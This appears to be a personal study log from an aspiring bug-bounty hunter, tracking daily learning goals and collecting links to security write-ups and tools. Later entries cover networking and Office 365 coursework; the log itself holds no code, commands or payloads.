- #try to read 1 intrigity-blog Bug-Bytes per day
- #try to read payload artirst weekly blog
- #try to read anurag sr news latter
- #try to daily hunt on "fastfoodhacking"
- #read disclosed report ✅
- Email verificaton bypass - https://youtu.be/TR9zYu1jnGU
- #learn python ✅
Date - 6/1/2022
- #solve tryhackme room
- #read zseano print book
- #read firstblood1/2 Disclosed report
- #want to create some usefull tool (if possible)
- #try to do some manual recon on BugBounty program / JS recon ✅
- reported bug. ✅
- #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
- #try to read 1 intrigity-blog Bug-Bytes per day
- #try to read payload artirst weekly blog
- #try to read anurag sr news latter
- #try to daily hunt on "fastfoodhacking"
- #read disclosed report
Date - 7/1/2022
- #solve tryhackme room
- #read zseano print book
- #read firstblood1/2 Disclosed report
- #want to create some usefull tool (if possible)
- #try to do some manual recon on BugBounty program / JS recon ✅
- #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
- #try to read 1 intrigity-blog Bug-Bytes per day
- #try to read payload artirst weekly blog
- #try to read anurag sr news latter
- #try to daily hunt on "fastfoodhacking"
- #read disclosed report ✅
- #learn python ✅
- classes and object
Date - 8/1/2022
-
#solve tryhackme room
-
#read zseano print book
-
#read firstblood1/2 Disclosed report
-
#want to create some usefull tool (if possible)
-
#try to do some manual recon on BugBounty program / JS recon ✅
-
#leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
-
#try to read 1 intrigity-blog Bug-Bytes per day ✅
- https://blog.intigriti.com/2021/11/03/bug-bytes-145-how-to-make-a-million-in-4-years-cookiemonster-threats-to-ci-cd-pipelines/?utm_source=newsletter&utm_medium=email&utm_campaign=bug_bytes_145_how_to_make_a_million_in_4_years_cookiemonster_threats_to_ci_cd_pipelines&utm_term=2022-01-01
- Intersting i found
- Damn Vulnerable NodeJS Application (https://github.com/effortlessdevsec/ninjasworkout)
- Enumerating Services in AWS Accounts in an Anonymous and Unauthenticated Manner (https://sidechannel.blog/en/enumerating-services-in-aws-accounts-in-an-anonymous-and-unauthenticated-manner/index.html)
- Defeating Android Certificate Pinning with Frida & frida-android-unpinning (https://httptoolkit.tech/blog/frida-certificate-pinning/)
- CookieMonster (https://github.com/iangcarroll/cookiemonster/)
- jolokia-exploitation-toolkit (JET) (https://github.com/laluka/jolokia-exploitation-toolkit)
- Intersting i found
- https://blog.intigriti.com/2021/11/03/bug-bytes-145-how-to-make-a-million-in-4-years-cookiemonster-threats-to-ci-cd-pipelines/?utm_source=newsletter&utm_medium=email&utm_campaign=bug_bytes_145_how_to_make_a_million_in_4_years_cookiemonster_threats_to_ci_cd_pipelines&utm_term=2022-01-01
-
#try to read payload artirst weekly blog
-
#try to read anurag sr news latter
-
#try to daily hunt on "fastfoodhacking"
-
#read disclosed report ✅
- Prototype Pollution by @Dheerajmadhukar (https://youtu.be/pjPz-12LYQI)
Date - 9/1/2022
-
#solve tryhackme room
-
#read zseano print book
-
#read firstblood1/2 Disclosed report
-
#want to create some usefull tool (if possible)
-
#try to do some manual recon on BugBounty program / JS recon
-
#leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
-
#try to read 1 intrigity-blog Bug-Bytes per day ✅
-
#try to read payload artirst weekly blog
-
#try to read anurag sr news latter
-
#try to daily hunt on "fastfoodhacking"
-
#read disclosed report ✅
- https://www.kitploit.com/2021/12/top-20-most-popular-hacking-tools-in.html?m=1
- https://github.com/budtmo/docker-android (for me intersting)
- https://www.p1boom.com/2022/01/how-to-find-your-first-cyber-security-internship.html.html
- https://infosecwriteups.com/unauthenticated-account-takeover-through-forget-password-c120b4c1141d
- https://infosecwriteups.com/account-takeovers-believe-the-unbelievable-bb98a0c251a4 (This is awesome)
- https://systemweakness.com/common-nginx-misconfiguration-leads-to-path-traversal-d58701e997bc
- https://medium.com/@sarafsaransh321/the-password-bypass-leads-to-full-account-takeover-9aefa7e3a9dd
- https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139
- https://www.kitploit.com/2021/12/top-20-most-popular-hacking-tools-in.html?m=1
Date - 10/1/2022
- #solve tryhackme room
- #read zseano print book
- #read firstblood1/2 Disclosed report
- #want to create some usefull tool (if possible)
- #try to do some manual recon on BugBounty program / JS recon ✅
- #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
- #try to read 1 intrigity-blog Bug-Bytes per day
- #try to read payload artirst weekly blog
- #try to read anurag sr news latter
- #try to daily hunt on "fastfoodhacking"
- #read disclosed report ✅
- https://medium.com/@arthbajpai277/hello-everyone-my-name-is-arth-bajpai-im-from-lucknow-india-and-this-is-my-first-writeup-2ec6a54226c5
- watch dheeraj sir open security [DevSecOps] Session
- Writing our own nuclei templete {https://youtu.be/vefj0tkTWL4}
Date - 11/1/2022
- #solve tryhackme room
- #read zseano print book
- #read firstblood1/2 Disclosed report
- #want to create some usefull tool (if possible)
- #try to do some manual recon on BugBounty program / JS recon
- #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
- #try to read 1 intrigity-blog Bug-Bytes per day
- #try to read payload artirst weekly blog
- #try to read anurag sr news latter
- #try to daily hunt on "fastfoodhacking"
- #read disclosed report ✅
- https://medium.com/techiepedia/p5-to-p1-intresting-account-takeover-6e59b879494b (For me new ideas can be found)
- https://www.youtube.com/watch?v=kT_rhV8IpiA (PoC) (Idea same sceniro is different)
- https://hackerone.com/reports/727330
- https://docs.google.com/presentation/d/1QzBl3k3n2q44ULyfZgr_gPZexj8nF5vD8JrS5AUJRbs/edit#slide=id.ge3728174e8_0_23 (password reset slide by)
Date = 12/1/2022
-
#solve tryhackme room
-
#read zseano print book
-
#read firstblood1/2 Disclosed report
-
#want to create some usefull tool (if possible)
-
#try to do some manual recon on BugBounty program / JS recon
-
#leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
-
#try to read 1 intrigity-blog Bug-Bytes per day ✅
- https://blog.intigriti.com/2022/01/12/bug-bytes-154-url-parsing-confusion-forging-cookies-for-almost-100k-exploiting-impossible-pickle-deserialization/
- what i found usefull for me
- https://matthewdf10.medium.com/so-you-want-to-use-the-aws-free-tier-2b2adac13952 {so-you-want-to-use-the-aws-free-tier}
- https://youtu.be/8MxpaxY2axo {HTTP Smuggling from inception to nowadays by Milan Charniak Red Teamer and Penetration Tester}
- https://servicenger.com/mobile/facebook-android-webview-vulnerability/ {Facebook-android-webview-vulnerability}
- https://twitter.com/snap_sec/status/1479030972263723015 {8 different techniques to Bypass Rate Limits}
- https://github.com/mikedesu/amass-setup {Amass-Setup}
- what i found usefull for me
- https://blog.intigriti.com/2022/01/12/bug-bytes-154-url-parsing-confusion-forging-cookies-for-almost-100k-exploiting-impossible-pickle-deserialization/
-
#try to read payload artirst weekly blog
-
#try to read anurag sr news latter
-
#try to daily hunt on "fastfoodhacking"
-
#read disclosed report ✅
Date - 13/1/2022
- #solve tryhackme room
- #read zseano print book
- #read firstblood1/2 Disclosed report
- #want to create some usefull tool (if possible)
- #try to do some manual recon on BugBounty program / JS recon ✅
- clear some confusion.
- #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
- #try to read 1 intrigity-blog Bug-Bytes per day
- #try to read payload artirst weekly blog
- #try to read anurag sr news latter
- #try to daily hunt on "fastfoodhacking"
- #read disclosed report✅
Date -14/1/2022
- #solve tryhackme room
- #read zseano print book
- #read firstblood1/2 Disclosed report
- #want to create some usefull tool (if possible)
- #try to do some manual recon on BugBounty program / JS recon ✅
- #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
- #try to read 1 intrigity-blog Bug-Bytes per day
- #try to read payload artirst weekly blog
- #try to read anurag sr news latter
- #try to daily hunt on "fastfoodhacking"
- #read disclosed report
Date - 15/1/2022
- #solve tryhackme room
- #read zseano print book
- #read firstblood1/2 Disclosed report
- #want to create some usefull tool (if possible)
- #try to do some manual recon on BugBounty program / JS recon ✅
- #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
- #try to read 1 intrigity-blog Bug-Bytes per day
- #try to read payload artirst weekly blog
- #try to read anurag sr news latter
- #try to daily hunt on "fastfoodhacking"
- #read disclosed report ✅
- https://hackerone.com/reports/1114347 {Account takeover due to misconfiguration}
- https://hackerone.com/reports/17474
Date - 16/1/2022
- #solve tryhackme room
- #read zseano print book
- #read firstblood1/2 Disclosed report
- #want to create some usefull tool (if possible)
- #try to do some manual recon on BugBounty program / JS recon ✅
- #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
- #try to read 1 intrigity-blog Bug-Bytes per day
- #try to read payload artirst weekly blog
- #try to read anurag sr news latter
- #try to daily hunt on "fastfoodhacking"
- #read disclosed report ✅
-
https://medium.com/@tameemkhalid786/playing-with-password-reset-function-9346bcd8e125
-
https://medium.com/@Sm9l/bug-bounty-fingerprinting-204506945ab
-
https://medium.com/@cybersrikanth/password-reset-functionality-for-devsec-e19fc84c35ae {This is realy awesome wirteup You can find devloper mindeset, you can get idea about when Devloper implement password-reset funcation what are possible mistake devloper can do. }
-
https://infosecwriteups.com/how-i-was-able-to-bypass-otp-token-requirement-in-razer-the-story-of-a-critical-bug-fc63a94ad572 {everyone must read this writeup you will be FUN}
- NOTE. There could be token-validation BUTTT missing user-token validation.
-
https://hackerone.com/reports/1276373 {gauth_secret token leak in response}
-
Date - 17/1/2022
- #solve tryhackme room
- #read zseano print book
- #read firstblood1/2 Disclosed report
- #want to create some usefull tool (if possible)
- #try to do some manual recon on BugBounty program / JS recon ✅
- #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
- #try to read 1 intrigity-blog Bug-Bytes per day
- #try to read payload artirst weekly blog
- #try to read anurag sr news latter
- #try to daily hunt on "fastfoodhacking"
- #read disclosed report
Date - 18/1/2022
-
#solve tryhackme room
-
#read zseano print book
-
#read firstblood1/2 Disclosed report
-
#want to create some usefull tool (if possible)
-
#try to do some manual recon on BugBounty program / JS recon ✅
-
#leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
-
#try to read 1 intrigity-blog Bug-Bytes per day
-
#try to read payload artirst weekly blog
-
#try to read anurag sr news latter ✅
-
#try to daily hunt on "fastfoodhacking"
-
#read disclosed report ✅
Date - 22/1/2022
- #solve tryhackme room
- #read zseano print book
- #read firstblood1/2 Disclosed report
- #want to create some usefull tool (if possible)
- #try to do some manual recon on BugBounty program / JS recon
- #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
- #try to read 1 intrigity-blog Bug-Bytes per day
- #try to read payload artirst weekly blog
- #try to read anurag sr news latter
- #try to daily hunt on "fastfoodhacking"
- #read disclosed report ✅
Date - 24/1/2022
- #solve tryhackme room
- #read zseano print book
- #read firstblood1/2 Disclosed report
- #want to create some usefull tool (if possible)
- #try to do some manual recon on BugBounty program / JS recon
- #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
- #try to read 1 intrigity-blog Bug-Bytes per day
- #try to read payload artirst weekly blog
- #try to read anurag sr news latter
- #try to daily hunt on "fastfoodhacking"
- #read disclosed report
- #revise some network topic ✅
- IP Address
- Bridge,PoE(Power over Ethernet)
Date - 26/1/2022
- #solve tryhackme room
- #read zseano print book
- #read firstblood1/2 Disclosed report
- #want to create some usefull tool (if possible)
- #try to do some manual recon on BugBounty program / JS recon
- #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
- #try to read 1 intrigity-blog Bug-Bytes per day
- #try to read payload artirst weekly blog
- #try to read anurag sr news latter
- #try to daily hunt on "fastfoodhacking"
- #read disclosed report ✅
- https://kuldeep.io/posts/120-days-of-high-frequency-hunting/
- Fundamentals of Bug Bounty Recon by https://twitter.com/codingo_ {https://www.youtube.com/watch?v=DABPWQ40yb0}
- https://www.getrevue.co/profile/hetmehtaa/issues/the-secure-edge-daily-round-up-of-infosec-blogs-issue-58-994435?utm_campaign=Issue&utm_content=view_in_browser&utm_medium=email&utm_source=The+Secure+Edge%3A+Daily+Round-up+of+Infosec+Blogs
Date - 27/1/2022
-
#solve tryhackme room
-
#read zseano print book
-
#read firstblood1/2 Disclosed report
-
#want to create some usefull tool (if possible)
-
#try to do some manual recon on BugBounty program / JS recon
-
#leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
-
#try to read 1 intrigity-blog Bug-Bytes per day
-
#try to read payload artirst weekly blog
-
#try to read anurag sr news latter ✅
-
#try to daily hunt on "fastfoodhacking"
-
#read disclosed report ✅
Date - 1/2/2022
- #solve tryhackme room
- #read zseano print book
- #read firstblood1/2 Disclosed report
- #want to create some usefull tool (if possible)
- #try to do some manual recon on BugBounty program / JS recon
- #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
- #try to read 1 intrigity-blog Bug-Bytes per day
- #try to read payload artirst weekly blog
- #try to read anurag sr news latter
- #try to daily hunt on "fastfoodhacking"
- #read disclosed report
Date - 5/2/2022
- #solve tryhackme room
- #read zseano print book
- #read firstblood1/2 Disclosed report
- #want to create some usefull tool (if possible)
- #try to do some manual recon on BugBounty program / JS recon
- #leanring about things how web-application works on react-js,Node JS etc.. , Different type of CMS or Etc.. Etc..
- #try to read 1 intrigity-blog Bug-Bytes per day
- #try to read payload artirst weekly blog
- #try to read anurag sr news latter
- #try to daily hunt on "fastfoodhacking"
- #read disclosed report
- https://www.getrevue.co/profile/hetmehtaa/issues/the-secure-edge-daily-round-up-of-infosec-blogs-issue-63-1005431?utm_campaign=Issue&utm_content=view_in_browser&utm_medium=email&utm_source=The+Secure+Edge%3A+Daily+Round-up+of+Infosec+Blogs
- https://www.getrevue.co/profile/hetmehtaa/issues/the-secure-edge-daily-round-up-of-infosec-blogs-issue-70-1020733?utm_campaign=Issue&utm_content=view_in_browser&utm_medium=email&utm_source=The+Secure+Edge%3A+Daily+Round-up+of+Infosec+Blogs
- { Get started hacking Django based Application }
- { HTTP Request Smuggling }
- https://www.getrevue.co/profile/hetmehtaa/issues/the-secure-edge-daily-round-up-of-infosec-blogs-issue-71-1022598?utm_campaign=Issue&utm_content=view_in_browser&utm_medium=email&utm_source=The+Secure+Edge%3A+Daily+Round-up+of+Infosec+Blogs
Date - 26/4/2022
- #solving python problem ✅
- Print without b' prefix for bytes in Python 3 [https://stackoverflow.com/questions/16748083/print-without-b-prefix-for-bytes-in-python-3]
Date - 30/4/2022
- #read disclosed report ✅
Date - 1/5/2022
- #read disclosed report ✅
- https://shreyaskoli.medium.com/ato-without-any-interaction-aws-cognito-misconfiguration-d690f4b3da11 [aws-cognito-misconfiguration or client side bypass]
Date - 3/5/2022
- #read disclosed report ✅
- https://www.getrevue.co/profile/hetmehtaa/issues/the-secure-edge-daily-round-up-of-infosec-blogs-issue-78-1044058?utm_campaign=Issue&utm_content=view_in_browser&utm_medium=email&utm_source=The+Secure+Edge%3A+Daily+Round-up+of+Infosec+Blogs
- Awesome year-wise collection of CVE PoCs [https://github.com/trickest/cve]
- https://www.getrevue.co/profile/hetmehtaa/issues/the-secure-edge-daily-round-up-of-infosec-blogs-issue-78-1044058?utm_campaign=Issue&utm_content=view_in_browser&utm_medium=email&utm_source=The+Secure+Edge%3A+Daily+Round-up+of+Infosec+Blogs
Date - 4/5/2022
- #read disclosed report ✅
- Learn with @j3ssiejjj - Automating Recon at scale using Osmedeus!! {https://youtu.be/ohi0fsLTesw}
Date - 7/5/2022
- #read disclosed report ✅
- working on python project
Date - 10/5/2022
- #read disclosed report ✅
- revise old linux topic.
- Python Web Penetration Testing Cookbook [Page : 1-25]
Date - 23/5/2022
- #read disclosed report ✅
Date - 27/5/2022
- #read disclosed report ✅
- revisting python old topic (Ex- Data types, funcation, Dict, Tuples etc... )
Date - 30/5/2022
- #Today learn from jetking classes ✅
- Learing about shared mail box in office 365
Date - 31/5/2022
- #read disclosed report ✅
- Learning Security Concept & Management. {https://docs.google.com/presentation/d/1ASBtHhkq9zLv4G0tCZLDhbUhbYX6vXa1/edit?usp=sharing&ouid=108625976354777920719&rtpof=true&sd=true}
Date - 1/6/2022
- #read disclosed report ✅
- Learing Bankend Technology About (Ex- Virtualization,Hypervisor,DC,Dcoker)
Date - 2/6/2022
- #Today learn from jetking classes ✅
- Learning Office 365 {Teams application uses}
- how to schedule metting
- Learning Office 365 {Teams application uses}
Date - 6/6/2022
- #Today learn from jetking classes ✅
- Learning About Onedrive.
- How to share any document from onedrive ?
- How to share document to a specific person ?
- How to share document to a specific Group ?
- Learning About Onedrive.
Date - 7/6/2022
- #Today learn from jetking classes ✅
- Attend PD Class mock
- watching old classes video
Date - 14/6/2022
- #Today learn from jetking classes ✅
- Configuring rip
- Learing About basic REQ,RES Header and etc.
Date - 15/6/2022
- #Today learn from jetking classes ✅
- how to configure DHCP in router.
- How to configure FTP in windows system.
Date - 16/6/2022
-
#Today learn from jetking classes ✅
- RAID-0 & RAID-1 configuration
- How to create simple volume ?
- How to create spanned volume ?[Dynamic disk ea ai gulo create korte hoba]
- How to configure Raid-0 ?{dynamic volume}
- How to create RAID1 or Mirrored Volume ?
-
#Pratical Done ✅
- Configuring DHCP & RIP v1 in cisco packet tracer.
- rip akta question jigasa korte hoba. ✅
- how to configure DHCP in router ✅
-
#Dheeraj sir class
- AWS Class Recording ✅ - Date [16/6/2022] - Time [7:59]
Date - 17/6/2022
- #Today learn from jetking classes ✅
- Create outlook & configured outlook account.
- Configured Telnet in router [Cisco Packet Tracer]
- Offline file sharing
Date - 18/6/2022
-
#Today learn from jetking classes ✅
- Create outlook & configured outlook account.
- Configured Telnet in router [Cisco Packet Tracer]
- Offline file sharing
-
#Pratical Done ✅
- Map network drive.
-
#Pending Task
- ajke [telnet] er command gulo lekha hoy ni video ta dekhe likte hoba.✅ - Date [18/6/2022] - Time [9:02]
- offline bapare sir ejta bolo sai video tau akbar dakte hoba. ✅ - Date [18/6/2022] - Time [9:30]
-
#Dheeraj sir class
- How to Monitor Server,Serices,Docker Container Using Nagios. ✅